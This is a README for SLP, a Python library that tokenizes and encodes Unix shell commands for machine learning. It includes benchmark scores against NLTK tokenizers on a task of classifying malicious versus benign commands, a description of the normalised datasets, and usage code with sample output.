Shell Language Processing (SLP)
SLP provides a tokenization and encoder classes for parsing of Unix/Linux shell commands, so raw commands (e.g. from auditd
logs or bash history) can be used for Machine Learning purposes.
Evaluation
We performed evaluation of tokenization quality in comparison with alternatives from NLTK's WordPunctTokenizer and WhiteSpaceTokenizer, which known to be used in industry for IT log parsing.
Results:
Tokenizer | F1 | Precision | Recall | AUC |
---|---|---|---|---|
SLP (ours) | 0.874 | 0.980 | 0.789 | 0.994 |
WordPunct | 0.392 | 1.0 | 0.244 | 0.988 |
WhiteSpace | 0.164 | 1.0 | 0.089 | 0.942 |
Assessment done on the security classification problem, where we train an ML model to distinguish malicious command samples from benign activity.
Legitimate commands data/nl2bash.cm
consist of nl2bash dataset. Original data can be found here.
Malicious examples data/malicious.cm
were collected from various Penetration Testing resources and scripts, some examples:
All commands are normalized: domain names are replaced by example.com and all IP addresses with 1.1.1.1, sot the evaluation focuses on the command syntactic structure. For practical realisations we suggest to perform similar normalization, to avoid overfitting to a specific hostnames or addresses. Maliciousness checks of IP addresses or hostnames can be performed separately in a manual manner using something like GreyNoise API.
For classification we train a gradient boosting ensemble of decision trees, with the specific realization from XGBoost.
Experiments can be observed or replicated in this notebook.
Example usage
from slp import ShellTokenizer, ShellEncoder
with open("commands.txt") as file:
data = file.readlines()
tokenizer = ShellTokenizer()
command_corpus, command_counter = tokenizer.tokenize(data)
print(command_counter.most_common(5))
"""
[('find', 7846),
('|', 6487),
('.', 3775),
('-name', 3616),
('-type', 3403)]
"""
encoder = ShellEncoder(command_corpus, command_counter, top_tokens=500, verbose=False)
X_tfidf = encoder.tfidf()
# shape: (commands, top_tokens)
print(X_tfidf.shape)
pprint(X_tfidf.toarray()[:5,:])
"""
(100, 500)
array([[0.15437351, 0.09073 , 0. , ..., 0. , 0. ,
0. ],
[0.05145784, 0.06048667, 0.2277968 , ..., 0. , 0. ,
0. ],
[0.03704964, 0.0435504 , 0.16401369, ..., 0. , 0. ,
0. ],
[0. , 0.36292 , 0. , ..., 0. , 0. ,
0. ],
[0.18524821, 0.217752 , 0. , ..., 0. , 0. ,
0. ]])
"""
At this point data is ready to be supplied as input for your ML model:
mymodel.fit(X_tfidf, y)
Additional notes
-
Tokenization heavily depends on bashlex library, but implements additional wrapping for problematic cases.
-
Some ideas of exploratory data analysis, visualiations and examples can be found under
/eda/
and under/examples/
: